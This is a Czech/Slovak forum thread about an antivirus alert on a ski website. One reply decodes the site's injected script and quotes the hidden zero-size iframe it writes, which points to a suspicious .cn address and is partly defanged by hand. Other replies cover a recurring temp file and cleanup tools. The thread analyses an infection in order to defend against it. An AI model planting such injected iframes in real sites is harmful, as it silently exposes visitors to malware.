Vir,nebo falešný poplach
Avast mi nečekaně zahlásil vir na stránce,měla by to být seriozní stránka,žádný warez nebo něco podobného.Spojení jsem ukončil a protože jsem se s něčím takovým setkal poprvé,tak nevím zda může být i otevření nějaké stránky nebezpečné.Mělo by to být zde
www.goski.sk
Aj NOD hlási Trojana
Na konci stranky je divny js, ale mne to ako virus nepripada.
Samotný JS není škodlivý, ale to, co vypíše už je na pováženou:
<iframe src="http: //polhfd 0.awasr.cn% 2C47index.ph p?out=120%2 C48094928" w%2 C105dth="0" 04eight="0 4></iframe >
Jsou tam malé chyby, dělal jsem to ručně, ale to, že to vypíše iframe vše vysvětluje.
U mna doslo k normalenmu redirectu na lanovky.sk a ziadny iframe sa nekonal.
Tak KAV nehlasi nic a normalne me tam pustil, tak ted jen doufam, ze to fakt nebyl vir.
Ty vado... Zapnu to a
dám delete a za deset minut znovu. Projedu v nouzovém režimu v Superantispyware, najde to 8 cookies, resetuji a zase. V po spuštění nic podezřelého...
Jdu mrknout na toho batif.tmp
Možná by stačil ComboFix nebo ten soubor ručně dohledat, popř. totálně vymazat Temp soubory a vůbec i Temporary Internet Files, tam je javascriptů hodně...
Ale copak jsme to chytili!?
A pak ať mi nikdo neříká o tom, že Avira je lepší než Avast, s Avastem no problem, nic v msconfigu, nic v tempech atd.
to máš nejakú divnú inštaláciu,podla obrázku máš neaktívnu volbu Repair,nejde Ti Avira v nejakom demo režime ? rekontroluj si pre istotu nastavenia programu
Něco se furt generuje. Něco bat*.tmp jdu to prozkoumat.
jestli to komunikuje ven, třeba kvůli stahování, zkus log svého obousměrného firewallu.
nějaký process explorer a výpis co se spouští po startu by taky mohly uspět.